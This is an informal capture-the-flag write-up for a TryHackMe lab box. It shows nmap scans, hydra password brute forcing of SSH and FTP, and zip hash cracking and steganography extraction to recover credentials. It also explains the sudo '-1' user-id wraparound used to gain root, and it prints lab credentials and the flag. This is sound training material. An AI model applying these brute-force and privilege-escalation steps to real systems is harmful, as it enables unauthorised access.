Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-14 05:57 EDT
Nmap scan report for 10.10.196.182
Host is up (0.24s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 25.94 seconds
nmap -p- -Pn -A -T4 10.10.196.182 > Ascan.txt:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-14 05:56 EDT
Nmap scan report for 10.10.196.182
Host is up (0.23s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
Aggressive OS guesses: Linux 4.4 (97%), Android 9 - 10 (Linux 4.9 - 4.14) (96%), Linux 4.15 (96%), Linux 3.2 - 4.14 (96%), Linux 4.15 - 5.19 (96%), Linux 2.6.32 - 3.10 (96%), Linux 3.10 - 3.13 (95%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.13 (94%), Linux 3.10 - 4.11 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   191.20 ms 10.21.0.1
2   241.01 ms 10.10.196.182

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1168.88 seconds
version enum:
OpenSSH 7.6p1 has 3 username enum scripts for all versions under 7.7 it seems
there's a DoS for vsftpd 3.0.3 but that's useless for us
http enum:
just this on the root page:
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R
something to do with the user-agent. gonna keep it in the back pocket for now
time to do some dirbusting
dirbusting results:
nothing showed up on feroxbuster or ffuf
http enum 2:
let's see what the user-agent thing was by capturing an HTTP response and messing with the HTTP headers
there's only one redirect. everything else is the same
http-response for user-agent C:
HTTP/1.1 302 Found
Date: Mon, 14 Apr 2025 10:43:58 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: agent_C_attention.php
Content-Length: 218
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DocType html><html> <head> <title>Annoucement</title> </head> <body> <p> Dear agents, <br><br> Use your own <b> codename </b> as user-agent to access the site. <br><br> From,<br> Agent R </p> </body></html>
we can see the actual location in the Location header where it says: agent_C_attention.php
let's send a GET request there and see what we get
http-response:
HTTP/1.1 200 OK
Date: Mon, 14 Apr 2025 10:59:57 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 177
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Attention chris, <br><br>Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>From,<br>Agent R
got a possible username: chris. his password's apparently weak
so far the possible users are:
chris
Agent R
Agent J
ssh and ftp bruteforcing:
hydra -l chris -P /usr/share/wordlists/rockyou.txt ssh://10.10.196.182:22
while that runs imma run an ftp bruteforce as well since the room asks for it. oh and all nmap ftp scripts as well cuz why tf not
fun lmao. we already got the pass from ftp as well
found creds:
chris:crystal
ftp stuff:
let's try logging in and see what we find in there
yaay logged in. let's see what's there
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
let's get 'em all
wget -r ftp://chris:crystal@10.10.196.182/
To_agentJ.txt:
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
hmmmmmmm seems like all these alien photos are somehow fake and there's a real photo stored at /home/agentJ or something. and there's apparently user creds stored in these images. time to use steghide babyyyyy
the two pictures:
cutie.png:
cute-alien.jpg:
(the fake transparency really pisses me off smh)
image data extraction and enum:
used exiftool to see if there was any interesting metadata but didn't get anything
ran strings against both of them. there's a To_agentR.txt in the png file. didn't manage to find anything in the jpeg output cuz I'm not used to analyzing strings outputs yet
explanation of the hash string: (gonna look into this more)
john z2jHash.txt --wordlist=/usr/share/wordlists/rockyou.txt:
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alien (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2025-04-14 08:46) 3.571g/s 87771p/s 87771c/s 87771C/s christal..280789
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
yaay the zip pass is alien
extracted it with 7z x -palien filename and got To_AgentR.txt:
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
seems like a hash (it's not. it's base64)
ran echo QXJlYTUx | base64 -d and got Area51 which was the pass for steghide
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2025 - Luke Paris (Paradoxis)
StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.
StegSeek can be found at: https://github.com/RickdeJager/stegseek
Counting lines in wordlist..
Attacking file 'cute-alien.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: Area51doro1111
Tried 441075 passwords
Your file has been written to: cute-alien.jpg.out
Area51
new found pass: Area51
cute-alien.jpg:
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
james can run bash as any user other than root. the user id -1 is stored in binary using the two's complement rule, which turns it into the maximum value of a 32-bit integer:
when the system sees this max value it wraps around and treats it like 0. since we're not literally passing 0, sudo doesn't see that we're running it as root and runs it anyway; because of the binary conversion it gets treated as 0 and we get /bin/bash as root hehe
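Added illustration of the integer conversion described above (my own example, not code from the writeup or from sudo): the string "-1" parsed as a signed number and stored in an unsigned uid_t becomes 4294967295, so a root check that only compares against 0 does not flag it, and the hardened parser shows the input validation that stops such ids before any privilege check. All function names here are mine.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

/* Naive conversion of a "run as user #N" string: "-1" parses to the signed
 * value -1, and storing it in the unsigned uid_t wraps (two's complement)
 * to 4294967295, the largest 32-bit value. */
uid_t naive_parse_uid(const char *s) {
    return (uid_t)strtol(s, NULL, 10);
}

/* A privilege check that only compares against 0 never sees the wrapped
 * value as root, even though (uid_t)-1 is also the "leave the uid unchanged"
 * sentinel of setresuid(2), so a process already running as root stays root. */
bool naive_is_root(uid_t uid) {
    return uid == 0;
}

/* Hardened conversion: accept only a plain decimal string; refuse a leading
 * sign or whitespace, trailing garbage, overflow and the (uid_t)-1 sentinel.
 * Returns the uid on success or -1 when the input must be rejected. */
long long parse_uid_checked(const char *s) {
    char *end;
    unsigned long v;
    if (s == NULL || *s < '0' || *s > '9')   /* rejects "", "-1", "+1", " 1" */
        return -1;
    errno = 0;
    v = strtoul(s, &end, 10);
    if (errno == ERANGE || *end != '\0')      /* overflow or trailing junk */
        return -1;
    if (v >= (unsigned long)(uid_t)-1)        /* 4294967295 is not a real user */
        return -1;
    return (long long)v;
}

int main(void) {
    uid_t wrapped = naive_parse_uid("-1");
    printf("\"-1\" stored as uid_t: %u, naive root check: %s\n",
           (unsigned)wrapped, naive_is_root(wrapped) ? "root" : "not root");
    printf("checked parse of \"-1\": %lld, of \"1000\": %lld\n",
           parse_uid_checked("-1"), parse_uid_checked("1000"));
    return 0;
}
```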
root.txt:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
b53a02f55b57d4439e3341834d70c062
By,
DesKel a.k.a Agent R
THM answers:
ports open: 3
how do i redirect myself to a secret page?: user-agent